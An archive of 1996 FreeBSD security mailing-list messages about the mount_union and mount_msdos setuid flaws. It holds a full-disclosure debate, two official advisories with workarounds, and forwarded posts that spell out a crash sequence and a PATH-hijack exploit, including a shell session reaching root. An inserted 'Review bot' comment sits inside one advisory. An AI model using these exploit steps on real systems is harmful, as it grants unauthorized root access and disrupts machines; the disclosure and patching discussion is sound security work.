126 -----------------------------------| 500 West Kennedy Blvd., Lakewood, NJ-08701 Turning PCs into Workstations | E-Mail: scanner@webspan.net ===================================| SysAdmin / Network Engineer / Consultant From owner-freebsd-security Fri May 17 12:27:02 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id MAA11653 for security-outgoing; Fri, 17 May 1996 12:27:02 -0700 (PDT) Received: from fslg8.fsl.noaa.gov (fslg8.fsl.noaa.gov [137.75.131.171]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id MAA11648 for ; Fri, 17 May 1996 12:27:01 -0700 (PDT) Received: by fslg8.fsl.noaa.gov (5.57/Ultrix3.0-C) id AA06787; Fri, 17 May 96 19:26:24 GMT Message-Id: <9605171926.AA06787@fslg8.fsl.noaa.gov> Received: by emu.fsl.noaa.gov (1.40.112.3/16.2) id AA228791186; Fri, 17 May 1996 13:26:26 -0600 Date: Fri, 17 May 1996 13:26:26 -0600 From: Sean Kelly To: coredump@nervosa.com Cc: freebsd-security@freebsd.org In-Reply-To: (message from invalid opcode on Fri, 17 May 1996 09:52:26 -0700 (PDT)) Subject: Re: very bad Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Personally, I appreciate your posting of it. I rely on the mailing lists as the best sources for the latest information. Thanks to your posting, I've prevented the problem until a fix to the lower layers of code is implemented. 
-- Sean Kelly NOAA Forecast Systems Laboratory kelly@fsl.noaa.gov Boulder Colorado USA http://www-sdd.fsl.noaa.gov/~kelly/ From owner-freebsd-security Fri May 17 12:49:57 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id MAA13305 for security-outgoing; Fri, 17 May 1996 12:49:57 -0700 (PDT) Received: from ptavv.nsta.org (ptavv.gfoster.com [199.0.2.254]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id MAA13286; Fri, 17 May 1996 12:49:46 -0700 (PDT) Received: (from gfoster@localhost) by ptavv.nsta.org (8.7.5/8.6.12) id PAA00619; Fri, 17 May 1996 15:48:25 -0400 (EDT) Date: Fri, 17 May 1996 15:48:25 -0400 (EDT) From: Glen Foster Message-Id: <199605171948.PAA00619@ptavv.nsta.org> To: pst@shockwave.com CC: jkh@time.cdrom.com, davidg@Root.COM, jkh@freefall.freebsd.org, committers@freefall.freebsd.org, security@FreeBSD.org In-reply-to: <199605171749.KAA00487@precipice.shockwave.com> (message from Paul Traina on Fri, 17 May 1996 10:49:43 -0700) Subject: Re: cvs commit: src/sbin Makefile Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk How about rather than changing the Makefile to not install suid, the full path of modload be referenced in the source. Preserves the suid functionality and defeats the symlink attack. 
--- Glen Foster From owner-freebsd-security Fri May 17 13:24:56 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id NAA15929 for security-outgoing; Fri, 17 May 1996 13:24:56 -0700 (PDT) Received: from precipice.shockwave.com (precipice.shockwave.com [171.69.108.33]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id NAA15920; Fri, 17 May 1996 13:24:51 -0700 (PDT) Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.7.5/8.7.3) with ESMTP id NAA01405; Fri, 17 May 1996 13:23:16 -0700 (PDT) Message-Id: <199605172023.NAA01405@precipice.shockwave.com> To: Glen Foster cc: jkh@time.cdrom.com, davidg@Root.COM, jkh@freefall.freebsd.org, committers@freefall.freebsd.org, security@FreeBSD.org Subject: Re: cvs commit: src/sbin Makefile In-reply-to: Your message of "Fri, 17 May 1996 15:48:25 EDT." <199605171948.PAA00619@ptavv.nsta.org> Date: Fri, 17 May 1996 13:23:16 -0700 From: Paul Traina Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk There are two separate problems. One is the crash, which can only be solved via removing setuid (until we fix it), the other is the symlink attack, which has been fixed properly. Two separate security bulletins will be released shortly on this problem to freebsd-security-notifications@freebsd.org. From: Glen Foster Subject: Re: cvs commit: src/sbin Makefile How about rather than changing the Makefile to not install suid, the full path of modload be referenced in the source. Preserves the suid functionality and defeats the symlink attack. 
--- Glen Foster From owner-freebsd-security Fri May 17 14:51:37 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id OAA22600 for security-outgoing; Fri, 17 May 1996 14:51:37 -0700 (PDT) Received: from black.gensys.com (black.gensys.com [206.109.98.10]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id OAA22594 for ; Fri, 17 May 1996 14:51:33 -0700 (PDT) Received: (from jhupp@localhost) by black.gensys.com (8.7.5/8.6.12) id QAA11714 for freebsd-security@FreeBSD.org; Fri, 17 May 1996 16:51:28 -0500 (CDT) From: Jeff Hupp Message-Id: <199605172151.QAA11714@black.gensys.com> Subject: Re: very bad To: freebsd-security@FreeBSD.org Date: Fri, 17 May 1996 16:51:27 -0500 (CDT) In-Reply-To: from "Scanner SOD" at May 17, 96 02:46:28 pm X-Mailer: ELM [version 2.4 PL24 ME8a] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Scanner SOD shaped the electrons to the following form: : On Fri, 17 May 1996, Vladimir Jojic wrote: : : > : > Hi, : > : > What IS very bad about this whole thing, isn't the existence of this bug, : > as much as how easily information about it can be obtained. Even if : > you do send patch along with info, there is still danger that someone, : > gets up earlier than root, and then ... (sweet dreams, root!) : > : > I am not very familiar with mailing list programs, but there is a possible : > improvement (if it isn't yet done): : > [Suggestions deleted] : I have to agree. Myself and others on the FreeBSD Net : (http://www.bsdnet.org) have recently become very concerned about the : policies of the propagation, and lack thereof, of security information on : FreeBSD. I'm not blaming anyone; I acknowledge just how many hours there : are in a day for everyone. But we fear that as FreeBSD becomes a more : appealing route to take for a lot of ISPs, companies, etc..
That we are : going to wind up taking the same policies. See no evil hear no evil. : : I have complete faith that BSD is one of the most secure unicies out there, : But when a "feature" :) like the mount_union pops up it makes one wonder : what is wrong with that picture. I would like to volunteer to help out in : any way to see that something along the lines of vladimir's suggestions : are carried out. I think we need a fast, safe way to bring admins the : information that is critical. : Security through obscurity does not work. Spreading the word far and wide is the only hope of getting the word in all the right hands. If it gets out at all it will end up in the wrong hand. I was very happy to see this come across my desk as it allowed me to fix the problem as soon as word was out. -- Windows '95 ~ Never has so much done so little for so many. Jeff Hupp PGP Public Key available at http://gensys.com or on the key servers From owner-freebsd-security Fri May 17 15:17:06 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id PAA23971 for security-outgoing; Fri, 17 May 1996 15:17:06 -0700 (PDT) Received: from sea.campus.luth.se (sea.campus.luth.se [130.240.193.40]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id PAA23965 for ; Fri, 17 May 1996 15:17:04 -0700 (PDT) Received: (from karpen@localhost) by sea.campus.luth.se (8.6.12/8.6.12) id AAA00505 for freebsd-security@FreeBSD.org; Sat, 18 May 1996 00:17:48 +0200 Message-Id: <199605172217.AAA00505@sea.campus.luth.se> Subject: Re: very bad To: freebsd-security@FreeBSD.org Date: Sat, 18 May 1996 00:17:47 +0200 (MET DST) From: "Mikael Karpberg" In-Reply-To: <199605171621.KAA15772@natasha.scccc.com> from "Kevin J. Duling" at May 17, 96 10:21:57 am X-Mailer: ELM [version 2.4 PL25 ME8b] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Hello! 
> > Hi,
> >
> > What IS very bad about this whole thing, isn't existence of this bug,
> > as much as how easily information about it can be obtained. Even if
> > you do send patch along with info, there is still danger that someone
> > gets up earlier than root, and then ... (sweat dreams, root!)
>
> What might be a better solution is to announce that "There is a problem"
> then provide the fix...but don't illustrate the problem. That way everyone
> is immediately notified of the problem and a fix for it, but you don't have
> a list of instructions for how to crack in.
>
> Personally, I prefer having the instructions, but it's not a good idea...
>

Exactly. I think too many here have been cheering on Chris for announcing the bug. Not that it was not a good thing he did, since it was already out on other lists. There is no such thing as a list where only "serious admins" will be on. First, it would probably have to be encrypted, or something. Second, it's not like a root is always a nice person. I'm a root on my private little machine on the campus net here, for example. Anyone on here with a PC is a root on a FreeBSD machine if he likes. A root could also just care for his system, and hack other people's, trying to use their resources, or whatever. In any case, they can mail from root on a machine and join the "secure list".

Sending bugs you find ONLY to security-officer@freebsd.org enables him to fix a patch (quick one like the chmod in this case, or more drastic if needed) and mail to the list that there is a dangerous security hole and how to fix it. That way you can, if not stop, then at least slow down the guys that want to use the information to crack a system. And you still give the admins as much time to fix the hole as they get from a complete instruction on how to exploit it. Then, say two-three weeks later, you can post what the hole was about and what has been done, etc.
Then we honest guys that are merely interested in the details for fun still get to know them. The admins get a way to fix the hole before crackers get to them though, and a safe list is not needed.

Just my $0.02...

/Mikael

From owner-freebsd-security Fri May 17 15:34:14 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id PAA25205 for security-outgoing; Fri, 17 May 1996 15:34:14 -0700 (PDT)
Received: from apocalypse.superlink.net (root@apocalypse.superlink.net [205.246.27.150]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id PAA25194 for ; Fri, 17 May 1996 15:34:08 -0700 (PDT)
Received: (from marxx@localhost) by apocalypse.superlink.net (8.7.5/8.7.3) id OAA00874; Fri, 17 May 1996 14:43:35 -0400 (EDT)
Date: Fri, 17 May 1996 14:43:34 -0400 (EDT)
From: "Charles C. Figueiredo"
To: security@freebsd.org
Message-ID:
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="0-455475863-832358614=:856"
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info.

--0-455475863-832358614=:856
Content-Type: TEXT/PLAIN; charset=US-ASCII

"I don't want to grow up, I'm a BSD kid. There's so many toys in /usr/bin that I can play with!"

------------------------------------------------------------------------------
Charles C.
Figueiredo Marxx marxx@superlink.net
------------------------------------------------------------------------------

--0-455475863-832358614=:856
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="mount-bug.txt"
Content-Transfer-Encoding: BASE64
Content-ID:
Content-Description:
--0-455475863-832358614=:856--

From owner-freebsd-security Fri May 17 16:00:53 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id QAA27091 for security-outgoing; Fri, 17 May 1996 16:00:53 -0700 (PDT)
Received: from onyx.auscert.org.au (onyx0.auscert.org.au [203.5.112.10]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id QAA27085 for ; Fri, 17 May 1996 16:00:50 -0700 (PDT)
Received: from amethyst.auscert.org.au (amethyst.auscert.org.au [203.5.112.218]) by onyx.auscert.org.au (8.7.5/8.7.1) with ESMTP id JAA07101; Sat, 18 May 1996 09:00:46 +1000 (EST)
Received: from localhost (localhost [127.0.0.1]) by amethyst.auscert.org.au (8.7.5/8.7.2) with SMTP id JAA15072; Sat, 18 May 1996 09:00:45 +1000 (EST)
Message-Id: <199605172300.JAA15072@amethyst.auscert.org.au>
X-Authentication-Warning: amethyst.auscert.org.au: Host localhost [127.0.0.1] didn't use HELO protocol
To: invalid opcode
cc: Vladimir Jojic , freebsd-security@freebsd.org
Subject: Re: very bad
In-reply-to: Your message of "Fri, 17 May 1996 09:52:26 MST."
Date: Sat, 18 May 1996 09:00:44 +1000
From: Danny Smith
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

invalid opcode writes:
> On Fri, 17 May 1996, Danny Smith wrote:
>
> > Another unfortunate part is that it is approaching midnight in Australia
> > (and it is now past midnight in New Zealand) at the start of the weekend.
> > Posting vulnerability information like this has not helped any system
> > administrators if they are all home for the weekend. All it has done
> > is increase the exposure of their systems to attack by more people.
>
> First off, I wouldn't have posted it had it been a secret little bug. But
> it wasn't, it was already out on 2 mailing lists which probably have
> close to 10,000 people on them, 50% of which are people who LOOK for
> these types of bugs so they can login to their accounts running FreeBSD
> and exploit it. At this point, the more exposure it gets, the more
> root@vulnerablehost will hear about it and fix it.

Again, the debate of full disclosure arises. I recognise that by mailing on this again, I am inflaming the situation.

For the record, I am not against full disclosure, but it must be done correctly. Posting full "how to" instructions late on a Friday night is not the "correct" way to do it. I accept that the information was available elsewhere initially. The problem more lay in the original posting to the first list, rather than the last. I am not pointing fingers, since the information is out now and the community must deal with that.

As suggested by others, once a suitable workaround can be developed, then simply an acknowledgement of the problem and a supplied workaround *at the same time* would suffice.

There is so much security information available that it is difficult to know what is real, what is false, and what will correctly fix the problem. Everyone has an opinion. Posting a notice like "There is a hole in FreeBSD. Make /bin/sh SUID to fix the current problem" is obviously false information. Other subtle code fixes presented to groups may contain either malicious fixes, or may introduce further problems. How is the poor system administrator supposed to "know" what is correct and what isn't? (The fix to this problem obviously solves the problem - what does it break though?)
The other situation of "FreeBSD 2.1.0 is affected - I don't care about anything else" is really just a selfish attitude. How many other releases are affected? What about other versions of BSD? Are there any other related programs? Is it better to fix the code, work around the problem, disable the service? What will I break? These questions really need answers before alerting the wider community with full "how to" instructions.

It is unfortunate that there are system administrators that are not as talented as many of the readers on this list. They need explicit instructions for closing holes, and for binary-only operating systems, these must often come from the vendor. Many people choose to use FreeBSD and similar simply because you get the source code. So long as you are able to use the source code, then you are way ahead of the rest. Most are not in this enviable position though.

Enough of my wasting your time. Again, I apologise for inflaming the situation. If anyone wants to continue this discussion off-line from the mailing list, then I am happy to have a "sensible, mature" discussion of some of the issues.

Danny Smith.

==========================================================================
Danny Smith                  | Fax: +61 7 3365 4477
AUSCERT                      | Phone: +61 7 3365 4417
c/- Prentice Centre          | (answered during business hours)
The University of Queensland | (on call after hours for emergencies)
Qld. 4072. Australia         | Internet: auscert@auscert.org.au

Standard Disclaimer: My opinions do not necessarily reflect the policy of AUSCERT or The University of Queensland.
From owner-freebsd-security Fri May 17 16:27:31 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id QAA29140 for security-outgoing; Fri, 17 May 1996 16:27:31 -0700 (PDT)
Received: from sasami.jurai.net (root@sasami.jurai.net [206.151.208.162]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id QAA29134 for ; Fri, 17 May 1996 16:27:29 -0700 (PDT)
Received: from localhost (winter@localhost) by sasami.jurai.net (8.7.4/8.7.3) with SMTP id SAA09654; Fri, 17 May 1996 18:27:17 -0500 (CDT)
Date: Fri, 17 May 1996 18:27:17 -0500 (CDT)
From: "Matthew N. Dodd"
X-Sender: winter@sasami
To: "Kevin J. Duling"
cc: freebsd-security@freebsd.org
Subject: Re: very bad
In-Reply-To: <199605171621.KAA15772@natasha.scccc.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Fri, 17 May 1996, Kevin J. Duling wrote:
> What might be a better solution is to announce that "There is a problem"
> then provide the fix...but don't illustrate the problem. That way everyone
> is immediately notified of the problem and a fix for it, but you don't have
> a list of instructions for how to crack in.
> Personally, I prefer having the instructions, but it's not a good idea...

Sorry, if a problem is to be taken seriously then it must present um... 'clear and present danger'. I saw the exploit and went "sh*t! this is bad." I had all my machines fixed a minute later and then went poking around and crashed my test box trying out the exploit.

If you get the whole of the problem out, and FORCE it to be a problem, then you won't have to worry about people brushing it off. If they get burned, then they have only themselves to blame for not taking the problem seriously and fixing it.

I'm not worried about any of my users exploiting these bugs, as I've no qualms about feeding them to legal and letting them play with those guys.

Full disclosure, with exploits please.
| Matthew N. Dodd   | winter@jurai.net    | http://www.jurai.net/~winter |
| Technical Manager | mdodd@intersurf.net | http://www.intersurf.net     |
| InterSurf Online  | "Welcome to the net Sir, would you like a handbasket?" |

From owner-freebsd-security Fri May 17 16:30:57 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id QAA29459 for security-outgoing; Fri, 17 May 1996 16:30:57 -0700 (PDT)
Received: from precipice.shockwave.com (precipice.shockwave.com [171.69.108.33]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id QAA29443; Fri, 17 May 1996 16:30:51 -0700 (PDT)
Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.7.5/8.7.3) with ESMTP id QAA02390; Fri, 17 May 1996 16:30:52 -0700 (PDT)
Message-Id: <199605172330.QAA02390@precipice.shockwave.com>
To: freebsd-security-notifications@freebsd.org, freebsd-announce@freebsd.org
cc: freebsd-security@freebsd.org
From: FreeBSD Security Officer
Reply-To: security-officer@freebsd.org
Subject: FreeBSD Security Advisory: FreeBSD-SA-96:09.vfsload
Date: Fri, 17 May 1996 16:30:52 -0700
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-96:09                                           Security Advisory
                                                        The FreeBSD Project, Inc.

Topic:          unauthorized access via mount_union / mount_msdos (vfsload)

Category:       core
Module:         libc
Announced:      1996-05-17
Affects:        FreeBSD 2.0, 2.0.5, 2.1, 2.1-stable, and 2.2-current
Corrected:      1996-05-17 2.1-stable and 2.2-current sources
Source:         FreeBSD native bug
FreeBSD only:   yes

Patches:        ftp://freebsd.org/pub/CERT/patches/SA-96:09/
=============================================================================

I.   Background

A bug was found in the vfsload(3) library call that affects all versions of FreeBSD from 2.0 through 2.2-CURRENT that caused a system vulnerability.
This problem is present in all source code and binary distributions of FreeBSD version 2.x released before 1996-05-18.

The FreeBSD project is aware of active exploits of this vulnerability. All FreeBSD users are encouraged to use the workaround provided until they can update their operating system to a version with this vulnerability fixed.

II.  Problem Description

The mount_union and mount_msdos programs invoke another system utility in an insecure fashion while setuid root.

III. Impact

The problem could allow local users to gain unauthorized permissions. This vulnerability can only be exploited by users with a valid account on the local system.

IV.  Solution(s)

Update operating system sources and binaries to FreeBSD 2.1-stable or FreeBSD 2.2-current as distributed later than 1996-05-18 or, if you are currently running 2.1 or later, you may apply the solution patches available at the URL listed at the top of this message.

The OS updates fix the actual problem in the vfsload(3) library routine. Once the vfsload() library routine is fixed, the workaround listed below is not necessary to solve this problem. However, an additional stability problem has come to light (ref. FreeBSD SA-96:10), so the FreeBSD project suggests using both the setuid workaround and the solution for best results.

V.   Workaround

This vulnerability can quickly and easily be limited by removing the setuid permission bit from the mount_union and mount_msdos programs. This workaround will work for all versions of FreeBSD affected by this problem.

As root, execute the command:

	% chmod u-s /sbin/mount_union /sbin/mount_msdos

then verify that the setuid permissions of the files have been removed.
The permissions array should read "-r-xr-xr-x" as shown here:

	% ls -l /sbin/mount_union /sbin/mount_msdos
	-r-xr-xr-x  1 root  bin  151552 Apr 26 04:41 /sbin/mount_msdos
	-r-xr-xr-x  1 root  bin   53248 Apr 26 04:40 /sbin/mount_union

In addition to changing the permissions on the executable files, if you have the source code installed, we suggest patching the sources so that mount_union will not be installed with the setuid bit set:

*** /usr/src/sbin/mount_union/Makefile Sun Nov 20 14:47:52 1994 - --- /usr/src/sbin/mount_union/Makefile Fri May 17 10:36:09 1996 *************** *** 8,14 **** CFLAGS+= -I${.CURDIR}/../../sys -I${MOUNT} .PATH: ${MOUNT} - - BINOWN= root - - BINMODE=4555 - - .include - --- 8,11 ----
*** /usr/src/sbin/i386/mount_msdos/Makefile Sun Dec 4 00:01:24 1994 - --- /usr/src/sbin/i386/mount_msdos/Makefile Fri May 17 11:31:57 1996 *************** *** 6,14 **** SRCS= mount_msdos.c getmntopts.c MAN8= mount_msdos.8 - - BINOWN= root - - BINMODE= 4555 - - MOUNT= ${.CURDIR}/../../mount CFLAGS+= -I${MOUNT} .PATH: ${MOUNT} - --- 6,11 ----

=============================================================================
The FreeBSD Project, Inc.
Web Site:                       http://www.freebsd.com/
Confidential contacts:          security-officer@freebsd.org
PGP Key:                        ftp://freebsd.org/pub/CERT/public_key.asc
Security notifications:         security-notifications@freebsd.org
Security public discussion:     security@freebsd.org

Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary.
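Review bot: in the mount_union hunk (old lines 8,14 to new 8,11) the `.include` context line has lost its argument, and the leading `- -` / `- ---` dashes are PGP-escaped exactly as the advisory's Notice warns, so neither this hunk nor the mount_msdos one (6,14 to 6,11) will apply as printed here; what they actually remove is only the `BINOWN= root` and `BINMODE=4555` (`BINMODE= 4555`) lines, which is what stops the helpers being installed setuid, so take both patches from the URL at the top of the advisory and confirm the installed mode afterwards with the `ls -l` check from the Workaround section.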
=============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

From owner-freebsd-security Fri May 17 16:35:40 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id QAA00107 for security-outgoing; Fri, 17 May 1996 16:35:40 -0700 (PDT)
Received: from precipice.shockwave.com (precipice.shockwave.com [171.69.108.33]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id QAA29997; Fri, 17 May 1996 16:35:33 -0700 (PDT)
Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.7.5/8.7.3) with ESMTP id QAA02421; Fri, 17 May 1996 16:35:40 -0700 (PDT)
Message-Id: <199605172335.QAA02421@precipice.shockwave.com>
To: freebsd-security-notifications@freebsd.org, freebsd-announce@freebsd.org
cc: security@freebsd.org
From: FreeBSD Security Officer
Reply-To: security-officer@freebsd.org
Subject: FreeBSD Security Advisory: FreeBSD-SA-96:10.mount_union
Date: Fri, 17 May 1996 16:35:40 -0700
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

This is the second of two related security advisory notices.

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-96:10                                           Security Advisory
                                                        The FreeBSD Project, Inc.

Topic:          system stability compromise via mount_union program

Category:       core
Module:         unionfs
Announced:      1996-05-17
Affects:        FreeBSD 2.0, 2.0.5, 2.1, 2.1-stable, and 2.2-current
Corrected:      (workaround) 2.1-stable and 2.2-current as of 1996-05-17
Source:         4.4BSD (lite)
FreeBSD only:   no

Patches:        ftp://freebsd.org/pub/CERT/patches/SA-96:10/
=============================================================================

I.   Background

A bug was found in the union file system code which can allow an unprivileged local user to compromise system stability. This problem is present in all source code and binary distributions of FreeBSD version 2.x released before 1996-05-18.

All FreeBSD users are encouraged to use the workaround provided until the FreeBSD Project distributes a full solution.

II.  Problem Description

The union filesystem code had problems with certain mount ordering problems. By executing a certain sequence of mount_union commands, an unprivileged local user may cause a system reload.

NOTE: This is a different problem than the one discussed in FreeBSD SA-96:09. The workaround for this vulnerability is similar to the one discussed in 96:09, but the proper solution for the unauthorized access problem in 96:09 does not address this vulnerability.

III. Impact

The problem could allow local users to compromise system stability. This vulnerability can only be exploited by users with a valid account on the local system.

IV.  Solution(s)

The FreeBSD project is currently developing a solution to this problem; however, the proper solution will not be available until a future FreeBSD release. We do not anticipate releasing patches for previous versions of FreeBSD due to the extensive nature of this fix.

This security advisory will be updated as new information is made available.

V.   Workaround

This vulnerability can quickly and easily be limited by removing the setuid permission bit from the mount_union program. This workaround will work for all versions of FreeBSD affected by this problem.

As root, execute the command:

	% chmod u-s /sbin/mount_union

then verify that the setuid permissions of the files have been removed.
The permissions array should read "-r-xr-xr-x" as shown here:

	% ls -l /sbin/mount_union
	-r-xr-xr-x  1 root  bin  53248 Apr 26 04:40 /sbin/mount_union

In addition to changing the permissions on the executable files, if you have the source code installed, we suggest patching the sources so that mount_union will not be installed with the setuid bit set:

*** /usr/src/sbin/mount_union/Makefile Sun Nov 20 14:47:52 1994 - --- /usr/src/sbin/mount_union/Makefile Fri May 17 10:36:09 1996 *************** *** 8,14 **** CFLAGS+= -I${.CURDIR}/../../sys -I${MOUNT} .PATH: ${MOUNT} - - BINOWN= root - - BINMODE=4555 - - .include - --- 8,11 ----

=============================================================================
The FreeBSD Project, Inc.
Web Site:                       http://www.freebsd.com/
Confidential contacts:          security-officer@freebsd.org
PGP Key:                        ftp://freebsd.org/pub/CERT/public_key.asc
Security notifications:         security-notifications@freebsd.org
Security public discussion:     security@freebsd.org

Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary.
=============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

From owner-freebsd-security Fri May 17 16:45:35 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id QAA01126 for security-outgoing; Fri, 17 May 1996 16:45:35 -0700 (PDT)
Received: from io.org (io.org [198.133.36.1]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id QAA01121 for ; Fri, 17 May 1996 16:45:33 -0700 (PDT)
Received: from zap.io.org (taob@zap.io.org [198.133.36.81]) by io.org (8.6.12/8.6.12) with SMTP id TAA14734 for ; Fri, 17 May 1996 19:45:27 -0400
Date: Fri, 17 May 1996 19:44:25 -0400 (EDT)
From: Brian Tao
To: FREEBSD-SECURITY-L
Subject: SECURITY BUG in FreeBSD (fwd)
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Here's the same bug reported by someone else on the -hackers list, with both the kernel panic and root shell exploits.
--
Brian Tao (BT300, taob@io.org, taob@ican.net)
Systems and Network Administrator, Internet Canada Corp.
"Though this be madness, yet there is method in't"

---------- Forwarded message ----------
Date: Fri, 17 May 1996 19:06:03 -0400 (EDT)
From: Dan Polivy
To: freebsd-hackers@freebsd.org
Subject: SECURITY BUG in FreeBSD (fwd)

I came across this in my travels...thought you guys may be interested (in case you didn't already know)...It's worked for me on my -RELEASE and -STABLE machines...dunno about any others...
Dan

+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
| JRI HIS MIS Systems Administrator/Tech Support                  |
|////////////////////////////////////////////////////////////////|
| danp@busstop.org  dpolivy@jri.org  danp@library.pride.net       |
|\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\|
| Check out JRI's Homepage at http://www.jri.org                  |
|////////////////////////////////////////////////////////////////|
| EMail health@jri.org or check out http://www.jri.org/jrihealth  |
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+

---------------------------------

Hi!

FreeBSD has a security hole... dangerous is mount_union if suid is set

vulnerable systems are:
FreeBSD 2.1 RELEASE/2.2 CURRENT
probably FreeBSD 2.1 STABLE is not vulnerable

to crash system (as a normal user) try this:

mkdir a
mkdir b
mount_union ~/a ~/b
mount_union -b ~/a ~/b

to get euid try this:

export PATH=/tmp:$PATH   #if zsh, of course
echo /bin/sh >/tmp/modload
chmod +x /tmp/modload
mount_union /dir1 /dir2

and You are root!
Hole found by Adam Kubicki

Best wishes
Chris Labanowski KL

----------------------------------

From owner-freebsd-security Fri May 17 17:04:43 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id RAA02938 for security-outgoing; Fri, 17 May 1996 17:04:43 -0700 (PDT)
Received: from shell.aros.net (root@shell.aros.net [205.164.111.19]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id RAA02927; Fri, 17 May 1996 17:04:40 -0700 (PDT)
Received: (from angio@localhost) by shell.aros.net (8.7.5/Unknown) id SAA01785; Fri, 17 May 1996 18:04:25 -0600 (MDT)
From: Dave Andersen
Message-Id: <199605180004.SAA01785@shell.aros.net>
Subject: Re: very bad (fwd)
To: jkh@time.cdrom.com
Date: Fri, 17 May 1996 18:04:25 -0600 (MDT)
Cc: freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, angio@aros.net
X-Mailer: ELM [version 2.4ME+ PL13 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

Since it's already out, I'm CC:'ing this to the general list.

chmod u-s /sbin/mount_union is *not* a complete fix. The mount_msdos command is similarly vulnerable:

bash$ export PATH=/tmp:$PATH
bash$ whoami
angio
bash$ mount_msdos /asdf /tmp
# whoami
root

The only difference in this is that mount_msdos checks to see if the mount point exists before it tries to mount it.

My suggestion: chmod ug-s /sbin/mount_*

-Dave Andersen

----- Forwarded message from invalid opcode -----

Too bad it's already on BUGTRAQ and BoS which is way more than 1000 :-( And I would have sent it to security-officer@freebsd.org had I even known of such an address. The prepared fix is chmod u-s /sbin/mount_union.
